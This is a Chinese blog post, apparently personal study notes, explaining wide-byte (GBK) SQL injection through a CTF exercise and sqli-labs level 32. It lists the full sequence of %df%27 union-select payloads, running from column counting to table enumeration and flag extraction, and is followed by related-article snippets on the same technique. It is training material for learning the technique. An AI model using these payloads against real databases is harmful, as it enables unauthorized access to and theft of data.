宽字节注入学习笔记

最新推荐文章于 2023-02-13 12:30:00 发布
最新推荐文章于 2023-02-13 12:30:00 发布
阅读量199 收藏
点赞数
分类专栏: sql笔记 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50597969/article/details/112576198
版权

宽字节注入学习笔记

前言

这周学习sql注入,做笔记记录一下

一、什么是宽字节注入?

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、练习

题目链接:

http://chinalover.sinaapp.com/SQL-GBK/

sqli-labs 第32关(没有搭建的话可以去buuctf找basic中的sqli-labs)[这个可以配合理解,自行操作效果极佳]

在这里插入图片描述
随便输个id
在这里插入图片描述
尝试用单引号闭合
在这里插入图片描述
发现‘ ‘ ’(单引号)转变成了‘ \’ ’(反斜杠+单引号)
那就结合今天所学知识进行操作
首先利用order by 语句进行查询

?id=0%df%27 order by 1%23

结果如下:
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210113172529680.png

?id=0%df%27 order by 2%23

结果如下:
在这里插入图片描述

?id=0%df%27 order by 3%23

结果如下:
在这里插入图片描述
3的话出现报错说明只有2个字段

接着利用union select语句查询数据库

?id=0%df%27 union select 1,database()%23

结果如下:
在这里插入图片描述
有了数据库名之后接着往下查

?id=0%df%27 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23

结果如下:
在这里插入图片描述
接着查ctf4(其余几个有兴趣也可以查一下看看,给出ctf4是因为里边有flag)

这里给ctf4转为了16进制(记得在前边加上0x)

?id=0%df%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x63746634%23

结果如下:
在这里插入图片描述
看到了flag
继续查

?id=0%df%27%20union%20select%201,group_concat(flag)%20from ctf4%23

也可以这样查

?id=0%df%27%20union select 1,(select flag from ctf4)%23

结果如下:
在这里插入图片描述
这样就找到flag了

今天的记录就到这里啦

T0mrvvi1b3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-宽字节注入
渗透笔记
01-13 689
1. GBK编码 gbk为中文编码,是一种双字节编码,将两个字节编译为一个汉字,其中第一个字节称为高位字节,第二个字节称为低位字节。 编码范围 高位81-FE 低位40-FE 2.宽字节注入原理 2.1php测试代码 error_reporting(0); $id = $_GET['id']; $id = addslashes($id);
SQL注入之宽字节注入
weixin_46330722的博客
11-03 137
宽字节注入 最近复习了一下宽字节注入,就写篇文章来加深记忆
深入浅出带你学习宽字节注入
bluemoon_0的博客
02-13 716
深入浅出带你学习宽字节注入
宽字节注入
qlxmy的博客
02-20 1055
在使用PHP和Mysql时,设置“setcharacter_set_client=gbk”时可能会导致宽字节注入宽字节注入的原理是这样子的,当提交1.php?id=1时,假如Mysql语句为“select * from user where id=’1’”,当参数使用了addslashes()、mysql_escape_string()或者GPC开关来过滤单引号(’)、双引号(”)、反斜杠(\)
刷题笔记SQL注入漏洞测试(字节)
m0_67399862的博客
06-05 503
刷题笔记宽字节注入
spring 学习笔记
05-08
下面将根据“spring 学习笔记”的主题,对Spring框架进行深入的探讨。 一、依赖注入(DI) 依赖注入是Spring的核心功能,它允许对象之间的依赖关系在运行时动态地管理和配置,而不是在代码中硬编码。这样可以提高...
Javaq备战秋招面试题-重点学习笔记.zip
09-03
这份"Javaq备战秋招面试题-重点学习笔记.zip"文件包含了面试必备的Java知识点,帮助你全面复习并提升技能。 1. **基础语法**:理解并掌握Java的基础语法是所有Java程序员的起点,包括变量、数据类型(基本类型和...
JAVA学习笔记.zip
01-31
这份"JAVA学习笔记.zip"压缩包文件显然包含了关于Java编程的详细资料,可能是笔记、教程或者示例代码,旨在帮助学习者掌握Java的基础知识和高级特性。 首先,让我们从基础开始。Java的基础包括语法结构、数据类型、...
JAVASE学习笔记
09-03
3. **流与IO**(马士兵_J2SE第八章_流_IO_个人学习笔记.doc):Java的流API提供了一种处理输入/输出的方式,包括字节流和字符流,分为节点流和处理流。流的方向可以是输入、输出或者双向。IO操作涉及文件、网络、...
Java 学习笔记Java学习笔记
01-15
Java是一种广泛使用的面向对象的编程语言,由Sun Microsystems(现为Oracle公司的一部分)于1995年发布。...Java学习笔记涵盖了这些核心知识点,通过深入学习和实践,你可以逐步掌握Java编程,并应用于实际项目开发中。
宽字节注入靶场练习
weixin_60777183的博客
08-30 378
课堂知识点: 当有魔术引号无法闭合时,绕过方法: 1.找不需要闭合的地方(即没有单双引号等闭合的地方) 2.仔细查看作用域(魔术引号只对get post cookie传参有效) 3.字节法。(当我们在\前传了一个字符,用gbk编码可以跟\组成一个字,\就逃 逸了出来) ps:国际编码:utf-8 汉字编码:gbk 采用字节绕过的办法: url编码中,一个英文单引号’用url编码表示是 %27 url编码中,一个反斜杠\用url编码表示是 %5c %df\可以凑成汉字 %9c\ %dd\等也可以
bugku ctf sql注入 (宽字节注入毫无压力)
qq_42777804的博客
08-12 795
看一下这么一道题,分支比较低。 先进去看一下     让我们查询 id=1 的 string 字段    那就、先给他加上  ?id=1 发现还是这个界面 呀   那如果换为  id=2   看一下结果     下面会 变成  空白的 ~~~~~~ 那就只好用 ?id=1   这个了   正常注入    /?id=1' /?id=1'and 1=1%...
SQL注入-宽字节注入(十一)(面试热点)
Gjqhs的博客
02-20 866
实验目的 普及宽字节注入的原理和应用场合,以及宽字节注入的基本方法和流程。 实验环境 攻击机:告诉桃花不用开了 (1)操作系统:Windows10 (2)安装的应用软件:sqlmap、Burpsuite、FireFox浏览器插件Hackbar、 FoxyProxy等 (3)登录账号密码:操作系统帐号Admin,密码asdfghjkl 靶机:关键球 (1)操作系统:Centos7(本机亦可) (2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、Webug
宽字节注入靶场
weixin_45540609的博客
04-18 270
题目一——手工注入 输入' and 1=1 传参单引号被注释掉了,说明有宽字节注入 在1后添加%df传入汉字,注释掉单引号,传参正常了 1%df ' and 1=1 -- qwe 猜字段,有三个字段 1%df' order by 4 -- qwe 找回显点,回显点在2和3 1%df' union select 1,2,3 -- qwe 拿库名 1%df' union select 1,database(),3 -- qwe 拿表名 1%df' uni...
【ctf】sql注入——宽字节注入
wlllllianqing的博客
09-13 651
宽字节注入 宽字节注入:主要针对GBK编码的注入 基础:了解url转码 例如: 空格 : %20 ’ : %27 # :%23 \ : %5C addslashes() 函数 了解addslashes()函数,发现它会返回在预定义的字符之前添加反斜杠的字符串。 当我们进行注入时使用单引号或双引号进行语句的闭合时,该函数会自动在字符前添加反斜杠将字符转义,导致该字符无法实现作用而导致注入失败。 如何绕过addslashes()函数从而达到注入的效果呢? 方法一
CTF从入门到提升之宽字节注入
anquanniu的博客
08-15 1422
CTF入门到放弃 为什么说是从入门到放弃呢?(开个玩笑)如果说大家对CTF有了解的话,其实应该知道CTF是一个什么类型的比赛,这个比赛涉及的范围和影响有多大。如果说你真的想打好比赛,那也是真的非常不容易的,所以说这是非常困难的一件事情,初期可能学着学着就想放弃了,所以我就以这个来作为一个标题,当然本意不是让大家去放弃,就是为了让大家入个门然后再提升! 我会和我朋友一起来完成这门课程的讲解。 课程主...
在一个宽字节注入习题的情况下得到的知识集合
zezai3010的博客
12-13 948
一、数据库schema的解释 数据库中Schema和Database有什么区别 - 人生似烟的日志 - 网易博客 http://blog.163.com/baibai_zheng/blog/static/51980755201022125325689/ 在MySQL中创建一个Schema好像就跟创建一个Database是一样的效果,在SQL Server和Orcal数据库中好像又不一样. 目
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3982
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
南邮CTF--------签到题1
weixin_46204746的博客
02-10 2534
南邮CTF--------签到题 1.签到题(chinalover.sinaapp.com/web1/) 直接右键查看源码 flag is:nctf{flag_admiaanaaaaaaaaaaa} 2.签到题2 (teamxlc.sinaapp.com/web1/02298884f0724c04293b4d8c0178615e/index.php) 打开页面,...
sql注入宽字节注入
最新发布
07-28
SQL注入和宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值